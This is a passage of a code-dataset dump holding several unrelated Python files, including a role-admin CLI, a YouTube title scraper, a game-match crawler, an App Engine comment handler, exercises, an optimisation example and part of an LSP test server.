DropsDAO\nfrom src.Utils import Utils\nimport json\n\nclass Admin:\n\n def __init__(self, config):\n self.drops_dao = DropsDAO(config)\n self.config = config\n self.utils = Utils()\n \n \n\n def add_role_to_role(self, email, role):\n user_id = self.drops_dao.select_user_id_by_email(email)\n if user_id is None:\n return None\n current_roles = self.drops_dao.select_user_role_by_id(user_id[0])\n if current_roles is None:\n return None\n roles = str(current_roles[0]).split(\",\")\n if role in roles:\n print(\"user \" + email +\"actually have the role \" + role + \"\\n\")\n return None\n new_roles = str(current_roles[0]) + \",\" + role\n update = self.drops_dao.update_user_role_by_id(user_id[0], new_roles)\n \n def add_list_of_roles(self, jsonfile):\n for entry in jsonfile['entities']:\n self.add_role_to_role(entry['email'], 'employee')\n self.add_role_to_role(entry['email'], entry['entity'])\n\n\n\n def add_oauth_client(self, client_id, client_secret, redirect_uri):\n result = self.drops_dao.add_oauth_client(client_id, client_secret, redirect_uri)\n print(result)\n\n def parser(self, subparsers):\n parser = subparsers.add_parser('admin', help='setup docker ')\n parser.add_argument(\n '-r', '--role',\n nargs=2,\n metavar=('email, role'),\n help=\"add role to user\"\n )\n parser.add_argument(\n '-l', '--list',\n nargs=1,\n metavar=('list'),\n help=\"add list of email role tuple\"\n )\n parser.set_defaults(which=\"admin\")\n return parser\n\n def execute(self, args, parser):\n if args.role is not None:\n output = self.add_role(args.role[0], args.role[1])\n print(output)\n elif args.list is not None:\n json_file = self.utils.load_json_from_file(args.list[0])\n self.add_list_of_roles(json_file)\n else:\n parser.print_help()\n","sub_path":"src/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"323609018","text":"# -*- coding: utf-8 -*-\n# Sage introspection build configuration file.\n# See sage.server.notebook.cell.set_introspect_html() for details.\n\nimport sys, os\nsys.path.append(os.environ['SAGE_DOC'])\nfrom common.conf import *\n\nextensions = ['sphinx.ext.autodoc', 'sphinx.ext.jsmath', 'sphinx.ext.todo',\n 'sphinx.ext.extlinks']\n\ntemplates_path = ['templates']\nhtml_static_path = ['static']\n\nhtml_use_modindex = False\nhtml_use_index = False\nhtml_split_index = False\nhtml_copy_source = False\n\ntodo_include_todos = True\n","sub_path":"doc/en/introspect/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"35197986","text":"#Project Started On: 25 - Oct - 2020\r\n#REQUIREMENTS: This scripts takes a url, URL Should be of youtube page.\r\n#WORKING: After this takes arguments, it will crawl the whole page and exract the titles of each video that is in the page.\r\nimport os, sys\r\nfrom bs4 import BeautifulSoup as bs\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom selenium.webdriver.common.keys import Keys\r\nimport time\r\nimport pandas as pd\r\ndef scrape_video_titles(playlist_url: str, opts: Options):\r\n assert isinstance(playlist_url, str)\r\n Chromepath = input('Enter the Path Of Chrome Webdriver')\r\n driver = webdriver.Chrome(options=opts, executable_path=Chromepath)\r\n driver.get(playlist_url)\r\n # get html\r\n elem = driver.find_element_by_tag_name('html')\r\n elem.send_keys(Keys.END)\r\n time.sleep(3)\r\n elem.send_keys(Keys.END)\r\n innerHTML = driver.execute_script(\"return document.body.innerHTML\")\r\n driver.close()\r\n # parse the html\r\n page_soup = bs(innerHTML, 'html.parser')\r\n res = page_soup.find_all('a', {'class': 'yt-simple-endpoint style-scope ytd-video-renderer'},)\r\n # get titles\r\n# print(res)\r\n titles=[]\r\n for video in res:\r\n if video.get('title') != None:\r\n titles.append((video.get('title')))\r\n return titles\r\nif __name__ == \"__main__\":\r\n print('Make sure that you are using terminal (Like termux)')\r\n clearType = input('This is Terminal YES OR NO? (y/n): ').lower()\r\n if clearType == 'y':\r\n clear = lambda:os.system('clear')\r\n elif clearType == 'n':\r\n sys.exit()\r\n else:\r\n print('Invalid input!!!')\r\n sys.exit()\r\n print('Installing The dependencies That are required')\r\n colors = {\r\n \"re\": \"\\u001b[31;1m\",\r\n \"gr\": \"\\u001b[32m\",\r\n \"ye\": \"\\u001b[33;1m\",\r\n }\r\n wt = (\r\n \"\"\"\r\n VIASK\r\n \"\"\"\r\n )\r\n time.sleep(1)\r\n re = \"\\u001b[31;1m\"\r\n gr = \"\\u001b[32m\"\r\n ye = \"\\u001b[33;1m\"\r\n if sys.version_info[0] < 3:\r\n telet = lambda :os.system('pip install -U beautifulsoup4')\r\n telet1 = lambda :os.system('pip install -U selenium')\r\n telet2 = lambda :os.system('pip install -U pandas') \r\n elif sys.version_info[0] >= 3:\r\n telet = lambda :os.system('pip install -U beautifulsoup4')\r\n telet1 = lambda :os.system('pip install -U selenium')\r\n telet2 = lambda :os.system('pip install -U pandas') \r\n telet()\r\n telet1()\r\n telet2()\r\n time.sleep(1)\r\n print(wt)\r\n clear()\r\n urls= input(re+'Enter the URL of the youtube page:')\r\n filename1 = input(gr+'Enter the saving name of file')\r\n filename = filename1 + '.txt'\r\n user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'\r\n opts = Options()\r\n opts.add_argument(f'user-agent={user_agent}')\r\n #urls = pd.read_csv('C:/Users/Nautiyal/Desktop/youtube.csv')\r\n save_path = filename\r\n # get titles\r\n print(re+'Running ........ ')\r\n titles = scrape_video_titles(urls, opts)\r\n with open(save_path, 'a', encoding=\"utf-8\") as f:\r\n f.write(str(titles))\r\n print(re+'Successfully Saved ','\\n',':-)','\\n','#VIASK')\r\n print(ye+wt)\r\n","sub_path":"Titles Scraping Main.py","file_name":"Titles Scraping Main.py","file_ext":"py","file_size_in_byte":3274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"489805372","text":"##This is the compute file \n\n##Note: Some of the implementations may be more accurate than others due to the dynamic step size \n\ndef hsb_substation_compute (hsb_ss_dc):\n\n ##hsb_ss_dc --- list of input values \n ##hsb_ss_dc[0,0] = hsb_ss_demand\n ##hsb_ss_dc[1,0] = hsb_ss_totalflownwk\n ##hsb_ss_dc[2,0] = hsb_ss_cp\n ##hsb_ss_dc[3,0] = hsb_ss_tinmax\n ##hsb_ss_dc[4,0] = hsb_ss_deltmax\n \n import numpy as np \n \n ##Calculating the constant value for the exting stream\n if hsb_ss_dc[1,0] == 0:\n exit_cst_value = 0\n else:\n flow = hsb_ss_dc[1,0] * 998.2 / 3600\n exit_cst_value = hsb_ss_dc[0,0] / (flow * hsb_ss_dc[2,0])\n \n ##Calculating the constraint equation coefficient \n if hsb_ss_dc[0,0] == 0:\n constraint_eqn_coeff = 0\n else:\n constraint_eqn_coeff = (flow * hsb_ss_dc[2,0]) / hsb_ss_dc[0,0] \n \n \n ##Initiate a matrix to hold the return values \n hsb_ss_calc = np.zeros((2,1))\n \n hsb_ss_calc[0,0] = exit_cst_value\n hsb_ss_calc[1,0] = constraint_eqn_coeff\n\n return hsb_ss_calc ","sub_path":"milp/milp_models/hsb_substation_compute.py","file_name":"hsb_substation_compute.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"362918063","text":"import DataPuller as d\nimport requests \nimport json\nimport os\nimport sys\nimport threading\nimport time\nimport zipUtilities as zu\nfrom zipfile import ZipFile\nfrom matchPusher import pushMatchesToSiteFromZip\nfrom datetime import datetime\n\ndef getAllMatchesForSummoner(summoner_name, season, region, players_to_add = 0, player_ids = {}):\n account_id = d.getAccountIdByName(summoner_name, region)\n begin_index = 0\n num_unique_games_for_summoner = 0\n num_duplicates = 0\n\n # Grab the first game of the season, then we can find how many games we'll need to officially grab.\n # Note the hard-coded 0, 100 -- just grab the first 100 games\n match_json = d.getMatchesByAccountId(account_id, region, season, d.RANKED_SOLO_QUEUE, 0, 100)\n\n if 'totalGames' in match_json:\n total_games = match_json['totalGames']\n else:\n print(\"No games found for this summoner.\")\n return\n\n res_tuple = save_match_ids(match_json, player_ids, players_to_add, region, season)\n num_unique_games_for_summoner += res_tuple[0]\n num_duplicates += res_tuple[1]\n\n while begin_index < total_games:\n begin_index += 100 # Add 100 to begin_index so the next loop keeps going\n # Note, this request assumes that the Riot API doesn't care if we\n # request more than the total number of games. I think that makes sense\n match_json = d.getMatchesByAccountId(account_id, region, season, d.RANKED_SOLO_QUEUE, begin_index, begin_index + 100)\n \n\n # Consider upping total_games... since this sometimes is weird and increases the more requests we have. Not sure why, I think this is a bug on their side tho\n if 'totalGames' in match_json:\n total_games = match_json['totalGames']\n\n # Save the unique game_ids\n res_tuple = save_match_ids(match_json, player_ids, players_to_add, region, season)\n num_unique_games_for_summoner += res_tuple[0]\n num_duplicates += res_tuple[1]\n\n # Display how many games we downloaded, compared to how many total games they have\n print(str(num_unique_games_for_summoner) + \" unique games [\" + \"{:.1%}\".format(num_unique_games_for_summoner / (num_unique_games_for_summoner + num_duplicates)) + \"] downloaded for \" + summoner_name)\n\n\ndef get_games_not_on_db(games_arr):\n # Do a remote query\n headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}\n response = requests.post('http://teamcomps.org:2021/matches/existence', data = json.dumps(games_arr), headers = headers)\n return response.json()\n\n# Parameters:\n# match_json: list of matches, basically\n# player_dic: list of players that we want to download games for\n# players_to_add: max numbers of players to queue up to add games for\n# region: \n# season: \n# Returns: Tuple, (num_games_downloaded, num_duplicate_games_found)\ndef save_match_ids(match_json, player_dic, players_to_add, region, season):\n games_to_download = []\n if 'matches' in match_json:\n for game in match_json['matches']:\n if 'gameId' in game:\n game_id = str(game['gameId'])\n games_to_download.append(game_id)\n\n num_of_games = len(games_to_download)\n games_to_download = get_games_not_on_db(games_to_download)\n # I'm interested in how many games we find duplicated... store and return to print later\n duplicated_games = num_of_games - len(games_to_download)\n\n # games_to_download is a list of unique game ids now\n # Just spawn threads to do the work here, we know it's at most 100\n threads = []\n num_threads = len(games_to_download) \n players_arr = [[] for i in range(num_threads)]\n time_to_sleep = [0 for i in range(num_threads)]\n need_more_players = len(player_dic) < players_to_add\n for i in range(num_threads):\n new_thread = threading.Thread(target=thread_function, args=(games_to_download[i], region, season, players_arr, need_more_players, i, time_to_sleep))\n threads.append(new_thread)\n # Don't fire a thread immediately, wait just .1 seconds...\n time.sleep(.05)\n new_thread.start()\n\n for thread in threads:\n thread.join()\n\n time_to_sleep.append(0) # Sometimes there were no games downloaded\n sleep_time_seconds = max(time_to_sleep)\n if sleep_time_seconds > 0:\n time1 = time.time()\n directory = \"../../matchData/\" + season + \"/\" + region\n print(\"Zipping, deleting originals, pushing to site.\")\n fancy_dir_name = directory + \"-\" + datetime.now().strftime(\"%d%m%Y-%H%M%S\")\n zu.createZip(directory, fancy_dir_name)\n zu.deleteFilesInFolder(directory)\n pushMatchesToSiteFromZip(fancy_dir_name)\n time2 = time.time()\n time_elapsed = time2 - time1\n if time_elapsed < sleep_time_seconds:\n sleepy_time = sleep_time_seconds - time_elapsed\n print(\"We finished the parsing, and we still will sleep for \" + str(sleepy_time) + \" seconds.\")\n time.sleep(sleepy_time)\n if need_more_players:\n for group in players_arr:\n group = set(group)\n for summoner_name in group:\n if summoner_name not in player_dic:\n player_dic[summoner_name] = 0\n\n return len(games_to_download), duplicated_games\n\n\n\n\ndef thread_function(game_id, region, season, players_arr, need_more_players, index, time_to_sleep):\n game_json = d.getMatch(game_id, region)\n if 'sleepTime' in game_json:\n print(\"Thread knows it should sleep. Return sleep value.\")\n time_to_sleep[index] = game_json['sleepTime']\n else:\n write_game_to_file(game_json, game_id, region, season)\n if need_more_players:\n save_player_ids(game_json, players_arr, index)\n\ndef save_player_ids(match_json, players_arr, index):\n if match_json and 'participantIdentities' in match_json:\n players = match_json['participantIdentities']\n for player in players:\n player_obj = player['player']\n if 'summonerName' in player_obj:\n summoner_name = player_obj['summonerName']\n players_arr[index].append(summoner_name)\n\ndef write_game_to_file(match_json, game_id, region, season):\n filename = game_id + '.json'\n directory = \"../../matchData/\" + season + \"/\" + region\n abspath = os.path.join(directory, filename)\n with open(abspath, 'w') as f:\n json.dump(match_json, f)\n\nif __name__ == \"__main__\":\n # Possible cmd arguments\n # -n: seed account name, like 'greelz'\n # -f: filename to parse existing game IDs \n # -r: region to use\n # -s: season to read from\n # -d: directory to parse games from\n # python createMatchList.py -n greelz -f test.xml -r na1 -s season2019\n region = 'na1'\n season = 'SEASON2019'\n filename = \"\"\n\n num_args = len(sys.argv)\n for indx, arg in enumerate(sys.argv):\n if indx == num_args - 1:\n break\n if arg == '-n': \n first_player = sys.argv[indx + 1]\n if arg == '-r': \n region = sys.argv[indx + 1]\n if arg == '-s':\n temp_season = sys.argv[indx + 1].upper()\n if temp_season in d._SEASONS:\n season = temp_season\n\n print(\"Downloading games for \" + first_player + \" on \" + region + \" in \" + season + \".\")\n players_list = { first_player: 1 }\n unique_players_to_add = 5000\n\n # From the seed account, add more summoners, then loop indefinitely\n getAllMatchesForSummoner(first_player, season, region, unique_players_to_add, players_list)\n\n while True:\n # Find the next summoner to download games from\n if len(players_list) > 0:\n for summoner in players_list:\n if players_list[summoner] == 0:\n break\n # Need to check if we've looped through the entire list of players\n if players_list[summoner] == 1:\n print(\"We've looped through all summoners. Complete.\")\n exit()\n else:\n print(\"We've looped through all summoners. Complete.\")\n exit()\n\n print(\"Downloading games for \" + summoner)\n # Now we have a new summoner, find their games and keep going\n players_list[summoner] = 1\n getAllMatchesForSummoner(summoner, season, region, unique_players_to_add, players_list)\n\n","sub_path":"python/createMatchList.py","file_name":"createMatchList.py","file_ext":"py","file_size_in_byte":8334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"56367880","text":"from handlers.base import BaseHandler\nfrom google.appengine.api import users\nfrom models.comment import Comment\nfrom models.topic import Topic\nfrom utils.decorators import validate_csrf\n\n\nclass CommentAdd(BaseHandler):\n @validate_csrf\n def post(self, topic_id):\n user = users.get_current_user()\n\n if not user:\n return self.write(\"Please login before you're allowed to post a topic.\")\n\n text = self.request.get(\"comment-text\")\n topic = Topic.get_by_id(int(topic_id))\n\n Comment.create(content=text, user=user, topic=topic)\n\n return self.redirect_to(\"topic-details\", topic_id=topic.key.id())\n\nclass CommentListHandler(BaseHandler):\n\n def get(self):\n user =users.get_current_user()\n commentList=Comment.query(Comment.deleted==False and Comment.author_email==user.email()).fetch()\n params={\"commentList\":commentList}\n return self.render_template_with_csrf(\"comment_list.html\", params=params)\n\n\n\nclass DeleteComment(BaseHandler):\n @validate_csrf\n def post(self, comment_id):\n comment=Comment.get_by_id(int(comment_id))\n user =users.get_current_user()\n\n if comment.author_email == user.email() or users.is_current_user_admin():\n Comment.delete(comment=comment)\n\n self.redirect_to(\"comment_list.html\", topic_id=comment.topic_id)\n","sub_path":"wd2-boilerplate-chapter-8-homework/handlers/comments.py","file_name":"comments.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"619672559","text":"#22 OOP (2)\n\n#1\n\nclass Stack:\n\n def __init__(self, elements = []):\n self.elements = elements\n \n def push(self, element):\n self.elements.append(element)\n \n def top(self):\n return self.elements[self.elements.len()]\n\n def pop(self):\n return self.elements.pop()\n\n#2\n\n def size(self):\n return self.elements.len()\n\n def isEmpty(self):\n if self.elements == []:\n return True\n else:\n return False\n\n def flip(self):\n self.elements.reverse()\n\n#4 \n\nclass Node:\n\n edges = []\n vertices = []\n id_count = 0\n\n def __init__(self, adjacent = []):\n self.adjacent = adjacent\n self.id = Node.id_count\n self.edges = Node.edges\n self.vertices = Node.vertices\n for v in adjacent:\n if not(self in v.adjacent):\n v.adjacent.append(self)\n if not([self, v] in Node.edges or [v, self] in Node.edges):\n Node.edges.append([self, v])\n Node.vertices.append(self)\n Node.id_count+=1\n \n#a\ngraph = range(15)\ngraph[0] = Node()\ngraph[1] = Node([graph[0]])\ngraph[2] = Node([graph[0]])\ngraph[3] = Node([graph[1]])\ngraph[4] = Node([graph[1]])\ngraph[5] = Node([graph[2]])\ngraph[6] = Node([graph[2]])\ngraph[7] = Node([graph[3]])\ngraph[8] = Node([graph[3]])\ngraph[9] = Node([graph[4]])\ngraph[10] = Node([graph[4]])\ngraph[11] = Node([graph[5]])\ngraph[12] = Node([graph[5]])\ngraph[13] = Node([graph[6]])\ngraph[14] = Node([graph[6]])\n\n'''\nfor i in range(1,15):\n if i%2 = 1:\n graph[i] = Node([graph[(i-1)/2]])\n else:\n graph[i] = Node([graph[(i/2)-1]])\n'''\n\n'''\nprint(Node.vertices)\nprint(Node.edges)\nprint(graph[7].adjacent)\n'''\n\ndef initDFS(start, dest):\n visited = []\n print(dFS(visited, start, dest))\n\ndef dFS(visited, start, dest):\n if not(start in visited):\n visited.append(start)\n print(start.id)\n if dest in start.adjacent:\n return True\n else:\n for v in start.adjacent:\n if dFS(visited, v, dest):\n return True\n return False\n\ninitDFS(graph[0],graph[14])\n\n\ndef initBFS(start, dest):\n visited = []\n toVisit = [start]\n print(bFS(visited, toVisit, dest))\n\ndef bFS(visited, toVisit, dest):\n if len(toVisit) != 0:\n start = toVisit.pop()\n visited.append(start)\n print(start.id)\n if start != dest:\n for v in start.adjacent:\n if not(v in visited):\n toVisit.insert(0,v)\n bFS(visited, toVisit, dest)\n return True\n else:\n return False\n\n\ninitBFS(graph[0],graph[14])\n","sub_path":"Python/GdP/ru09.py","file_name":"ru09.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"652215929","text":"\"\"\"\n.. module:: example_lower_confidence_bounds\n :synopsis: Example Lower Confidence Bounds\n.. moduleauthor:: David Eriksson \n\"\"\"\n\nimport logging\nimport os.path\n\nimport numpy as np\nfrom poap.controller import BasicWorkerThread, ThreadController\n\nfrom pySOT.experimental_design import SymmetricLatinHypercube\nfrom pySOT.optimization_problems import Hartmann6\nfrom pySOT.strategy import LCBStrategy\nfrom pySOT.surrogate import GPRegressor\n\n\ndef example_lower_confidence_bounds():\n if not os.path.exists(\"./logfiles\"):\n os.makedirs(\"logfiles\")\n if os.path.exists(\"./logfiles/example_lower_confidence_bounds.log\"):\n os.remove(\"./logfiles/example_lower_confidence_bounds.log\")\n logging.basicConfig(filename=\"./logfiles/example_lower_confidence_bounds.log\", level=logging.INFO)\n\n num_threads = 4\n max_evals = 100\n\n hart6 = Hartmann6()\n gp = GPRegressor(dim=hart6.dim, lb=hart6.lb, ub=hart6.ub)\n slhd = SymmetricLatinHypercube(dim=hart6.dim, num_pts=2 * (hart6.dim + 1))\n\n # Create a strategy and a controller\n controller = ThreadController()\n controller.strategy = LCBStrategy(\n max_evals=max_evals, opt_prob=hart6, exp_design=slhd, surrogate=gp, asynchronous=True\n )\n\n print(\"Number of threads: {}\".format(num_threads))\n print(\"Maximum number of evaluations: {}\".format(max_evals))\n print(\"Strategy: {}\".format(controller.strategy.__class__.__name__))\n print(\"Experimental design: {}\".format(slhd.__class__.__name__))\n print(\"Surrogate: {}\".format(gp.__class__.__name__))\n\n # Launch the threads and give them access to the objective function\n for _ in range(num_threads):\n worker = BasicWorkerThread(controller, hart6.eval)\n controller.launch_worker(worker)\n\n # Run the optimization strategy\n result = controller.run()\n\n print(\"Best value found: {0}\".format(result.value))\n print(\n \"Best solution found: {0}\\n\".format(\n np.array_str(result.params[0], max_line_width=np.inf, precision=5, suppress_small=True)\n )\n )\n\n\nif __name__ == \"__main__\":\n example_lower_confidence_bounds()\n","sub_path":"examples/example_lcb.py","file_name":"example_lcb.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"40449576","text":"IMG_SIZE=256\nIMG_ORG_SIZE=150\n\nWEIGHTS_FILE = None\nMAX_ITER = 10000\nREPEAT_TIME = 2500\nITER_PER_EPOCH = 4\nSAVE_ITER=100\nSAVE_FILE='ckpt_file'\n\n\n\nLEARNING_RATE = 0.0001\nDECAY_STEPS = 30000 # 这个是怎么定义的\nDECAY_RATE = 0.1\nSTAIRCASE = True\n\nSUMMARY_ITER = 10\nSUMMARY_DIR = './logs/'\n\nVALID_NUMS=10\n","sub_path":"Day10_1_My_Unet/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"58223574","text":"\"\"\"\nA simple test server for integration tests.\n\nOnly understands stdio.\nUses the asyncio module and mypy types, so you'll need a modern Python.\n\nTo make this server reply to requests, send the $test/setResponse notification.\n\nTo make this server do a request, send the $test/fakeRequest request.\n\nTo await a method that this server should eventually (or already has) received,\nsend the $test/getReceived request. If the method was already received, it will\nreturn None immediately. Otherwise, it will wait for the method. You should\nhave a timeout in your tests to ensure your tests won't hang forever.\n\nTo make server send out a notification, send the $test/sendNotification request\nwith expected notification method in params['method'] and params in params['params'].\nTests can await this request to make sure that they receive notification before code\nresumes (since response to request will arrive after requested notification).\n\nTODO: Untested on Windows.\n\"\"\"\nfrom argparse import ArgumentParser\nfrom enum import IntEnum\nfrom typing import Any, Callable, Dict, List, Optional, Tuple, Union, Iterable, Awaitable\nimport asyncio\nimport json\nimport os\nimport sys\nimport uuid\n\n\n__package__ = \"server\"\n__version__ = \"1.0.0\"\n\n\nif sys.version_info[0] < 3:\n print(\"only works for python3.6 and higher\")\n exit(1)\nif sys.version_info[1] < 6:\n print(\"only works for python3.6 and higher\")\n exit(1)\n\n\nStringDict = Dict[str, Any]\nPayloadLike = Union[List[StringDict], StringDict, None]\n\nENCODING = \"utf-8\"\n\n\nclass ErrorCode(IntEnum):\n # Defined by JSON RPC\n ParseError = -32700\n InvalidRequest = -32600\n MethodNotFound = -32601\n InvalidParams = -32602\n InternalError = -32603\n serverErrorStart = -32099\n serverErrorEnd = -32000\n ServerNotInitialized = -32002\n UnknownErrorCode = -32001\n\n # Defined by the protocol\n RequestCancelled = -32800\n ContentModified = -32801\n\n\nclass Error(Exception):\n\n def __init__(self, code: ErrorCode, message: str) -> None:\n super().__init__(message)\n self.code = code\n\n def to_lsp(self) -> StringDict:\n return {\"code\": self.code, \"message\": super().__str__()}\n\n @classmethod\n def from_lsp(cls, d: StringDict) -> 'Error':\n return Error(d[\"code\"], d[\"message\"])\n\n def __str__(self) -> str:\n return f\"{super().__str__()} ({self.code})\"\n\n\ndef jsonrpc() -> StringDict:\n return {\"jsonrpc\": \"2.0\"}\n\n\ndef make_response(request_id: Any, params: PayloadLike) -> StringDict:\n return {**jsonrpc(), \"id\": request_id, \"result\": params}\n\n\ndef make_error_response(request_id: Any, err: Error) -> StringDict:\n return {**jsonrpc(), \"id\": request_id, \"error\": err.to_lsp()}\n\n\ndef make_notification(method: str, params: PayloadLike) -> StringDict:\n return {**jsonrpc(), \"method\": method, \"params\": params}\n\n\ndef make_request(method: str, request_id: Any, params: PayloadLike) -> StringDict:\n return {**jsonrpc(), \"method\": method, \"id\": request_id, \"params\": params}\n\n\ndef dump(payload: PayloadLike) -> bytes:\n return json.dumps(\n payload,\n check_circular=False,\n ensure_ascii=False,\n separators=(\",\", \":\")).encode(ENCODING)\n\n\ndef content_length(line: bytes) -> Optional[int]:\n if line.startswith(b'Content-Length: '):\n _, value = line.split(b'Content-Length: ')\n value = value.strip()\n try:\n return int(value)\n except ValueError:\n raise ValueError(\"Invalid Content-Length header: {}\".format(value))\n return None\n\n\nclass MessageType:\n error = 1\n warning = 2\n info = 3\n log = 4\n\n\nclass StopLoopException(Exception):\n pass\n\n\nclass Request:\n\n async def on_error(self, err: Error) -> None:\n pass\n\n async def on_result(self, params: PayloadLike) -> None:\n pass\n\n\nclass SimpleRequest(Request):\n\n def __init__(self) -> None:\n self.cv = asyncio.Condition()\n self.result = None # type: PayloadLike\n self.error = None # type: Optional[Error]\n\n async def on_result(self, params: PayloadLike) -> None:\n self.result = params\n async with self.cv:\n self.cv.notify()\n\n async def on_error(self, err: Error) -> None:\n self.error = err\n async with self.cv:\n self.cv.notify()\n\n\nclass Session:\n\n def __init__(self, reader: asyncio.StreamReader, writer: asyncio.StreamWriter) -> None:\n self._reader = reader\n self._writer = writer\n\n self._response_handlers: Dict[Any, Request] = {}\n self._request_handlers: Dict[str, Callable[[PayloadLike], Awaitable[PayloadLike]]] = {}\n self._notification_handlers: Dict[str, Callable[[PayloadLike], Awaitable[None]]] = {}\n\n # initialize/shutdown/exit dance\n self._received_shutdown = False\n\n # properties used for testing purposes\n self._responses: List[Tuple[str, PayloadLike]] = []\n self._received: Dict[str, PayloadLike] = {}\n self._received_cv = asyncio.Condition()\n\n self._install_handlers()\n\n def _log(self, message: str) -> None:\n self._notify(\"window/logMessage\",\n {\"type\": MessageType.info, \"message\": message})\n\n def _notify(self, method: str, params: PayloadLike) -> None:\n asyncio.get_event_loop().create_task(self._send_payload(\n make_notification(method, params)))\n\n def _reply(self, request_id: Any, params: PayloadLike) -> None:\n asyncio.get_event_loop().create_task(self._send_payload(\n make_response(request_id, params)))\n\n def _error(self, request_id: Any, err: Error) -> None:\n asyncio.get_event_loop().create_task(self._send_payload(\n make_error_response(request_id, err)))\n\n async def request(self, method: str, params: PayloadLike) -> PayloadLike:\n request = SimpleRequest()\n request_id = str(uuid.uuid4())\n self._response_handlers[request_id] = request\n async with request.cv:\n await self._send_payload(make_request(method, request_id, params))\n await request.cv.wait()\n if isinstance(request.error, Error):\n raise request.error\n return request.result\n\n async def _send_payload(self, payload: StringDict) -> None:\n body = dump(payload)\n content = (\n f\"Content-Length: {len(body)}\\r\\n\".encode(ENCODING),\n \"Content-Type: application/vscode-jsonrpc; charset=utf-8\\r\\n\\r\\n\".encode(ENCODING),\n body)\n self._writer.writelines(content)\n await self._writer.drain()\n\n async def _receive_payload(self, payload: StringDict) -> None:\n try:\n if \"method\" in payload:\n if \"id\" in payload:\n await self._handle(\"request\", payload, self._request_handlers, payload[\"id\"])\n else:\n await self._handle(\"notification\", payload, self._notification_handlers, None)\n elif \"id\" in payload:\n await self._response_handler(payload)\n else:\n self._log(f\"Unknown payload type: {payload}\")\n except Exception as err:\n self._log(f\"Error handling server payload: {err}\")\n\n async def _response_handler(self, response: StringDict) -> None:\n request = self._response_handlers.pop(response[\"id\"])\n if \"result\" in response and \"error\" not in response:\n await request.on_result(response[\"result\"])\n elif \"result\" not in response and \"error\" in response:\n await request.on_error(Error.from_lsp(response[\"error\"]))\n else:\n await request.on_error(Error(ErrorCode.InvalidRequest, ''))\n\n def _on_request(self, request_method: str, handler: Callable[[PayloadLike], Awaitable[PayloadLike]]) -> None:\n self._request_handlers[request_method] = handler\n\n def _on_notification(self, notification_method: str, handler: Callable[[PayloadLike], Awaitable[None]]) -> None:\n self._notification_handlers[notification_method] = handler\n\n async def _handle(self, typestr: str, message: Dict[str, Any], handlers: Dict[str, Callable],\n request_id: Optional[int]) -> None:\n method = message.get(\"method\", \"\")\n params = message.get(\"params\")\n unhandled = True\n if not method.startswith(\"$test/\"):\n self._received[method] = params\n async with self._received_cv:\n self._received_cv.notify_all()\n unhandled = False\n handler = handlers.get(method)\n if handler is None:\n mocked_response = self._get_mocked_response(method)\n if not isinstance(mocked_response, bool):\n assert request_id is not None\n self._reply(request_id, mocked_response)\n elif request_id is not None:\n self._error(request_id, Error(\n ErrorCode.MethodNotFound, \"method '{}' not found\".format(method)))\n else:\n if unhandled:\n self._log(f\"unhandled {typestr} {method}\")\n elif request_id is not None:\n # handle request\n try:\n self._reply(request_id, await handler(params))\n except Error as ex:\n self._error(request_id, ex)\n except Exception as ex:\n self._error(request_id, Error(ErrorCode.InternalError, str(ex)))\n else:\n # handle notification\n try:\n await handler(params)\n except asyncio.CancelledError:\n return\n except Exception as ex:\n if not self._received_shutdown:\n self._notify(\"window/logMessage\", {\"type\": MessageType.error, \"message\": str(ex)})\n\n def _get_mocked_response(self, method: str) -> Union[PayloadLike, bool]:\n for response in self._responses:\n resp_method, resp_payload = response\n if resp_method == method:\n self._responses.remove(response)\n return resp_payload\n return False\n\n async def _handle_body(self, body: bytes) -> None:\n try:\n await self._receive_payload(json.loads(body))\n except IOError as ex:\n self._log(f\"malformed {ENCODING}: {ex}\")\n except UnicodeDecodeError as ex:\n self._log(f\"malformed {ENCODING}: {ex}\")\n except json.JSONDecodeError as ex:\n self._log(f\"malformed JSON: {ex}\")\n\n async def run_forever(self) -> bool:\n try:\n while not self._reader.at_eof():\n line = await self._reader.readline()\n if not line:\n continue\n try:\n num_bytes = content_length(line)\n except ValueError:\n continue\n if num_bytes is None:\n continue\n while line and line.strip():\n line = await self._reader.readline()\n if not line:\n continue\n body = await self._reader.readexactly(num_bytes)\n asyncio.get_event_loop().create_task(self._handle_body(body))\n except (BrokenPipeError, ConnectionResetError, StopLoopException):\n pass\n return self._received_shutdown\n\n def _install_handlers(self) -> None:\n self._on_request(\"initialize\", self._initialize)\n self._on_request(\"shutdown\", self._shutdown)\n self._on_notification(\"exit\", self._on_exit)\n\n self._on_request(\"$test/getReceived\", self._get_received)\n self._on_request(\"$test/fakeRequest\", self._fake_request)\n self._on_request(\"$test/sendNotification\", self._send_notification)\n self._on_request(\"$test/setResponses\", self._set_responses)\n self._on_notification(\"$test/setResponse\", self._on_set_response)\n\n async def _on_set_response(self, params: PayloadLike) -> None:\n if isinstance(params, dict):\n self._responses.append((params[\"method\"], params[\"response\"]))\n\n async def _set_responses(self, params: PayloadLike) -> PayloadLike:\n if not isinstance(params, list):\n raise Error(ErrorCode.InvalidParams, 'expected responses to be a list')\n\n for param in params:\n if 